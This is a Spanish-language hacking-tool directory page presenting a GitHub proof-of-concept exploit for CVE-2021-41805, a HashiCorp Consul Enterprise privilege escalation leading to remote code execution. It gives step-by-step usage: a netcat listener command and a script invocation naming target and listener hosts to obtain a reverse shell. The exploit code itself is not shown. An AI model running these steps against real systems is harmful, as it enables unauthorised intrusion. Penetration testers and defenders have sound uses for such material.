Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41805 — Una prueba de concepto para CVE-2021-41805 que es una vulnerabilidad en HashiCorp Consul Enterprise que permite la ejecución remota de código (RCE) con privilegios elevados. | Kitploit
Herramientas/GitHubGitHub/acfirthh/cve-2021-41805
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

Una prueba de concepto para CVE-2021-41805 que es una vulnerabilidad en HashiCorp Consul Enterprise que permite la ejecución remota de código (RCE) con privilegios elevados.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] AVISO LEGAL: ¡Esta herramienta es ESTRICTAMENTE solo para FINES EDUCATIVOS! El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ILEGAL. Es responsabilidad del usuario cumplir con todas las leyes aplicables al usar esta herramienta. El desarrollador de esta herramienta no asume ninguna responsabilidad ni es responsable por cualquier mal uso o daño causado por este programa.

Acerca del CVE

Un token ACL (con los permisos predeterminados operator:write) en un namespace puede ser utilizado para una escalada de privilegios no deseada en un namespace diferente. Esto se puede abusar para obtener Ejecución Remota de Código (RCE) con privilegios elevados.

Versiones afectadas

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

Instalación y ejecución del script

  • Primero, clona el repositorio:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • Cambia al directorio del repositorio clonado:
    cd CVE-2021-41805
  • Inicia un listener simple:
    nc -nvlp <LISTENER_PORT>
  • Ejecuta el script:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPCIONAL: -t <ACL token> -v (detallado) -s (usar SSL)]

Reverse Shell

Salida esperada

Ejecutando el exploit con los argumentos básicos: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [Usar SSL]) dará una salida básica como:

root@kitploit:~
[*] The PUT request was made successfully. Check your listener...

Ejecutando el exploit con los argumentos básicos más -v [VERBOSE] dará una salida detallada:
Verbose Output

Si ocurre un error al ejecutar el exploit y se especifica el argumento -v, la salida será algo como:
Verbose Output with Error

Descargar herramienta